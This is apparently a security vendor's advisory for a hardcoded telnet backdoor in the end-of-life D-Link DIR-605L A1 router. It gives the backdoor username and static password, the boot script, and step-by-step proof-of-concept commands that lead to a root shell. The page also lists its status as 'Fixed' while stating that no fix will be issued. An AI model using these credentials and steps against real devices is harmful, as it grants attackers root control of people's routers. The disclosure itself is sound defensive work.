SecurinZero Days
    Email Us
    Zero-Day Research/CVE-2026-42372
    ▲ HighCVSS 8.8✓ PatchedEPSS 0.00078%

    Hardcoded Telnet Backdoor in D-Link DIR-605L A1 (End-of-Life)

    D-Link DIR-605L Hardware Revision A1 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir605l" read from /etc/alpha_config/image_sign. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches.

    CVE IDCVE-2026-42372
    CVSS v3.18.8 High
    VendorD-Link Corporation / Alpha Networks Inc. (ODM)
    CWECWE-798, CWE-912, CWE-259
    DisclosedApr 21, 2026
    StatusFixed
    All advisories
    • 01Description
    • 02Proof of Concept
    • 03Vulnerable Code
    • 04Impact
    • 05Remediation
    • 06Timeline
    • 07References
    01/Description

    What this actually is.

    Technical background, root cause, and affected surface.

    D-Link DIR-605L Hardware Revision A1 is an End-of-Life (EOL) consumer router that contains a manufacturer-installed telnet backdoor with hardcoded credentials. This product reached End-of-Life (EOL) on November 17, 2023. D-Link has confirmed it will not release security patches for EOL products.

    The telnet daemon starts unconditionally at boot with the username "Alphanetworks" and the static password. This password is stored in plaintext at /etc/alpha_config/image_sign in the firmware filesystem and is identical across all DIR-605L A1 devices. Successful authentication grants a root shell with full administrative control.

    Vendor
    D-Link Corporation / Alpha Networks Inc. (ODM)
    Affected Product
    D-Link DIR-605L Hardware Revision A1 (End-of-Life)
    CVE
    CVE-2026-42372
    CWE
    CWE-798, CWE-912, CWE-259
    Status
    Fixed
    Date
    April 21, 2026
    Severity
    High
    CVSS Score
    8.8
    Vector
    CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    02/Proof of Concept

    From one request
    to root shell.

    Reproduced in a sandboxed environment. Requires only LAN or WiFi adjacency.

    8.8CVSS 3.1
    VectorCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    ScopeUnchanged
    ImpactC:H / I:H / A:H
    SeverityHigh

    An attacker on the same LAN or WiFi network as the DIR-605L A1 (EOL) can gain full root shell access by connecting to the telnet service (TCP port 23) and entering the hardcoded Alphanetworks credentials. No prior authentication, session tokens, or CSRF tokens are required. The backdoor is available immediately after device boot.Exploitation StepsStep 1: Connect to telnet on the router (default LAN IP)

    PoC · Exploitation Steps▲ trigger
    01telnet 192.168.0.102Step 2: At the "login:" prompt, enter the hardcoded username:03Alphanetworks04Step 3: At the "Password:" prompt, enter the firmware-specific password: sample05Step 4: Root shell is granted immediately:06id07uid=0(root) gid=0(root)08The attacker now has full control of the router.
    03/Vulnerable Code

    The bug, and the fix.

    Boot Script: /bin/telnetd.sh

    This script executes unconditionally at boot. There is no user-facing option to disable the telnet backdoor.

    QEMU Validation

    Tested with qemu-mips-static v7.2.0. Credentials delivered via named pipe (FIFO).

    typescript
    #!/bin/sh
    image_sign=`cat /etc/alpha_config/image_sign`
    echo "Start telnetd ..." > /dev/console
    if [ -f "/usr/bin/login" ]; then
        telnetd -l "/usr/bin/login" -u Alphanetworks:$image_sign -i br0 &
    else
        telnetd &
    fi

    Root cause: Backdoor originates from Alpha Networks Inc. (Taiwanese ODM). The "Alphanetworks" username, /etc/alpha_config/ directory, and wrg-prefixed passwords directly identify the ODM. Intended for factory testing but never removed from production firmware.

    04/Impact

    What an attacker does to you.

    Post-exploitation outcomes mapped to CVSS impact metrics.

    Exploitation grants a root shell on the DIR-605L A1 (End-of-Life). An attacker on the LAN/WiFi can:

    High

    Execute arbitrary commands as root

    High

    Read/modify all router configuration including WiFi passwords and DNS settings

    High

    Intercept, redirect, or modify all network traffic

    High

    Install persistent malware or pivot into the internal network

    05/Remediation

    Fix it. In this order.

    A runbook, not a checklist. Sequence matters — assume compromise before you act.

    01

    Replace the device immediately with a currently supported router model.

    N/A
    02

    Temporary: kill telnetd via backdoor and block port 23 (lost on reboot)

    N/A
    03

    Do not use this device for any security-sensitive network

    N/A

    This product is End-of-Life (EOL). No patches will be released by D-Link.

    Securin advisory — For coordinated remediation support or threat-actor briefings related to CVE-2026-42372, contact disclose@securin.io
    06/Disclosure Timeline

    Vendors moved in days.
    Attackers in hours.

    Reconstructed from vendor advisories, CISA bulletins, and Securin research records.

    April 20, 2026

    Backdoor identified via firmware static analysis

    April 20, 2026

    Validated via QEMU

    April 20, 2026

    Reported to Vendor

    April 21, 2026

    Vendor confirmed EoL status; no fix will be issued

    April 21,2026

    Follow up with Vendor

    April 24,2026

    Advisory release confirmed

    April 27, 2026

    CVE assigned: CVE-2026-42372

    Disclosed 4 days after discovery

    07/References

    Cite, verify, go deeper.

    Primary sources — NVD, CISA KEV, and machine-readable IoC feed.

    NVD

    NVD — CVE-2026-42372

    nvd.nist.gov/vuln/detail/CVE-2026-42372 →
    SEC

    Securin VI — Full Technical Analysis

    vi.securin.io →

    Let Securin level up your security posture.

    Get a live exposure assessment, threat-actor briefing tailored to your sector, and IoC mapping for your SIEM.

    Browse all advisories
    SecurinSecurinZero Days

    Securin's zero-day research operation combines frontier AI models with a decade of offensive expertise — discovering, validating, and coordinating the disclosure of high-impact vulnerabilities at a scale and speed no human team achieves alone.

    Glossary
    © 2026 Securin Inc · CVE Numbering Authority
    Privacy Policy·Data Processing Addendum